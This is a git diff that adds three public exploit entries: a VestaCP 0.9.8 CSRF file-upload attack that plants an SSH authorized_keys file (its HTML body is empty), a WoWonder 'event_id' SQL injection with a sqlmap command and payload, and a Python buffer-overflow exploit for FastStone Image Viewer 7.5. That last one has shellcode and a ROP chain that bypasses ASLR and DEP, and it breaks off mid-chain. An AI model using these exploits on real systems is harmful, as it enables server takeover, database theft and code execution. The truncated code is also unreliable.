diff --git a/exploits/multiple/webapps/49659.html b/exploits/multiple/webapps/49659.html new file mode 100644 index 000000000..7de410c75 --- /dev/null +++ b/exploits/multiple/webapps/49659.html @@ -0,0 +1,50 @@ +# Exploit Title: VestaCP 0.9.8 - File Upload CSRF +# Exploit Author: Fady Othman +# Date: 16-03-2021 +# Vendor Homepage: https://vestacp.com/ +# Software Link: https://github.com/myvesta/vesta +# Version: Vesta Control Panel (aka VestaCP) through 0.9.8-27 and myVesta through 0.9.8-26-39 +# CVE ID: CVE-2021-28379 +# Patch: https://github.com/myvesta/vesta/commit/3402071e950e76b79fa8672a1e09b70d3860f355 + +## Description +I found that the checks performed by the upload functionality are insufficient, the upload functionality is vulnerable to CSRF, in addition it allows uploading files and creating folders under "/tmp" and under the home folder (usually "/home/admin"), the later is the one that is important for this exploit to work. + +I was able to use this to create a ".ssh" folder in the admin home and upload "authorized_keys" file which allowed me to access the server later as "admin" using SSH. + +Since this relies on a *CSRF* the admin has to visit a link, please note that *sshd* is already installed by *VestaCP* when using the default installation script so no need to install it, also please note that files can be replaced so even if the admin has already added "authorized_keys" file, it will be replaced with the attacker's file. + +Affected endpoint: "/upload/index.php", i.e. "/upload/index.php?dir=/home/admin/.ssh/" + +## Steps to reproduce. +1. Install the latest version of VestaCP in your machine by following the instructions at https://vestacp.com/install/. +2. Login as the admin in Firefox, then open "exploit.html". +3. ssh into the machine using 'ssh -i id_rsa admin@victimmachine', now you have access as admin. + +# exploit.html + + + + + + + + + + + + \ No newline at end of file diff --git a/exploits/php/webapps/49657.txt b/exploits/php/webapps/49657.txt new file mode 100644 index 000000000..919999046 --- /dev/null +++ b/exploits/php/webapps/49657.txt @@ -0,0 +1,27 @@ +# Exploit Title: WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection +# Date: 16.03.2021 +# Exploit Author: securityforeveryone.com +# Author Mail: hello[AT]securityforeveryone.com +# Vendor Homepage: https://www.wowonder.com/ +# Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302 +# Version: < 3.1 +# Tested on: Linux/Windows + +DESCRIPTION + +In WoWonder < 3.1, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the event_id parameter. + +The vulnerability is found in the "event_id" parameter in GET request sent to page requests.php. +Example: +/requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID + +if an attacker exploits this vulnerability, attacker may access private data in the database system. + +EXPLOITATION + +# GET /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID HTTP/1.1 +# Host: Target + +Sqlmap command: sqlmap -r request.txt --risk 3 --level 5 --random-agent -p event_id --dbs + +Payload: f=search-my-followers&s=normal&filter=s4e&event_id=1') AND 5376=5376-- QYxF \ No newline at end of file diff --git a/exploits/windows/local/49660.py b/exploits/windows/local/49660.py new file mode 100755 index 000000000..776858b33 --- /dev/null +++ b/exploits/windows/local/49660.py @@ -0,0 +1,176 @@ +# Exploit title: FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass) +# Exploit Author: Paolo Stagno +# Date: 15/03/2020 +# Vendor Homepage: https://www.faststone.org/ +# Download: https://www.faststonesoft.net/DN/FSViewerSetup75.exe +# https://github.com/VoidSec/Exploit-Development/tree/master/windows/x86/local/FastStone_Image_Viewer_v.7.5/ +# Version: 7.5 +# Tested on: Windows 10 Pro x64 v.1909 Build 18363.1256 +# Category: local exploit +# Platform: windows + +# Module info : +#---------------------------------------------------------------------------------------------------------------------- +#Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path +#---------------------------------------------------------------------------------------------------------------------- +#0x00400000 | 0x00abf000 | 0x006bf000 | False | False | False | False | False | 7.5.0.0 [FSViewer.exe] (C:\Program Files (x86)\FastStone Image Viewer\FSViewer.exe) +#0x6ad80000 | 0x6adfe000 | 0x0007e000 | False | False | False | False | False | -1.0- [fsplugin05.dll] (C:\Program Files (x86)\FastStone Image Viewer\fsplugin05.dll) +#0x6afb0000 | 0x6b011000 | 0x00061000 | True | True | False | False | False | -1.0- [fsplugin06.dll] (C:\Program Files (x86)\FastStone Image Viewer\fsplugin06.dll) +#---------------------------------------------------------------------------------------------------------------------- + +#!/usr/bin/python +import struct, sys +print("\n[>] FastStone Image Viewer v. <= 7.5 Exploit by VoidSec\n") + +filename="FSViewer_v.7.5_exploit.cur" + +################################################################################### +# Shellcode +# MAX Shellcode size: 556 +# ImageData - ROP NOP - Rop Chain - Stack Adjustment = 776 - 144 - 68 - 8 = 556 +# Custom calc.exe shellcode +# size: 112 +################################################################################### + +shellcode=( + "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" + "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" + "\x77\x20\x8b\x3f\x80\x7e\x0c\x33" + "\x75\xf2\x89\xc7\x03\x78\x3c\x8b" + "\x57\x78\x01\xc2\x8b\x7a\x20\x01" + "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" + "\x45\x81\x3e\x43\x72\x65\x61\x75" + "\xf2\x81\x7e\x08\x6f\x63\x65\x73" + "\x75\xe9\x8b\x7a\x24\x01\xc7\x66" + "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" + "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" + "\xb1\xff\x53\xe2\xfd\x68\x63\x61" + "\x6c\x63\x89\xe2\x52\x52\x53\x53" + "\x53\x53\x53\x53\x52\x53\xff\xd7" +) + + +if (len(shellcode)>556): + sys.exit("Shellcode's size must be <= 556 bytes") + +################################################################################### +# Cur File Format +# --------------------------------------------------------------------------------- +# | Reserved | Type | Image Count | +# | 00 00 | 02 00 | 02 00 | <- CUR file will contains two images +# Entries: +# | Width | Height | ColorCount | Reserved | XHotSpot | YHotSpot | SizeInBytes | File Offset | +# | 30 | 30 | 00 | 00 | 01 00 | 02 00 | 30 03 00 00 | 26 00 00 00 | <- we'll corrupt the first image with rop chain & shellcode +# | 20 | 20 | 00 | 00 | 02 00 | 04 00 | E8 02 00 00 | 56 03 00 00 | <- while leaving the 2nd one "untouched" a part from the stack pivot (should leave the cursor preview intact) +# 1st Image Info Header: +# | Size | Width | Height | Planes | BitCount | Compression | ImageSize | XpixelsPerM | YpixelsPerM | Colors Used | ColorsImportant | +# | 28 00 00 00 | 30 00 00 00 | 60 00 00 00 | 01 00 | 89 30 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | +# 1st ImageData(BLOB) +# 2nd Image Info Header: +# 2nd ImageData(BLOB) +# --------------------------------------------------------------------------------- +# BitCount will be used to read # number of bytes into a buffer triggering the buffer overflow +# its value can be modified but we need to account for two operations happening into the software. +# - SHL 1, 89 = 0x200 +# - SHL 200, 2 = 0x800 (2048d) number of bytes to be read from the file +# we'll have to pad the image data to match it's size in bytes defined in the header SizeInBytes +# ImageData = SizeInBytes - ImageInfoHeader Size (330h-28h=308h 776d) +################################################################################### + +image_data_pad = 776 + +def create_rop_nop(): + rop_gadgets = [ + 0x6adc5ab6, # 0x6adc5ab6 (RVA : 0x00045ab6) : # DEC ECX # RETN ** [fsplugin05.dll] ** | {PAGE_EXECUTE_READ} + ] + return ''.join(struct.pack(' ebx + #[---INFO:gadgets_to_set_edx:---] + 0x004798db, # POP EDX ; RETN [FSViewer.exe] + 0x00000040, # 0x00000040-> edx + #[---INFO:gadgets_to_set_ecx:---] + 0x004c7832, # POP ECX ; RETN [FSViewer.exe] + 0x00991445, # &Writable location [FSViewer.exe] + #[---INFO:gadgets_to_set_edi:---] + 0x0040c3a8, # POP EDI ; RETN [FSViewer.exe] + 0x0057660b, # RETN (ROP NOP) [FSViewer.exe] + #[---INFO:gadgets_to_set_eax:---] + 0x00404243, # POP EAX ; RETN [FSViewer.exe] + 0x90909090, # nop + #[---INFO:pushad:---] + 0x6adc21bf, # PUSHAD # RETN [fsplugin05.dll] + ] + return ''.join(struct.pack('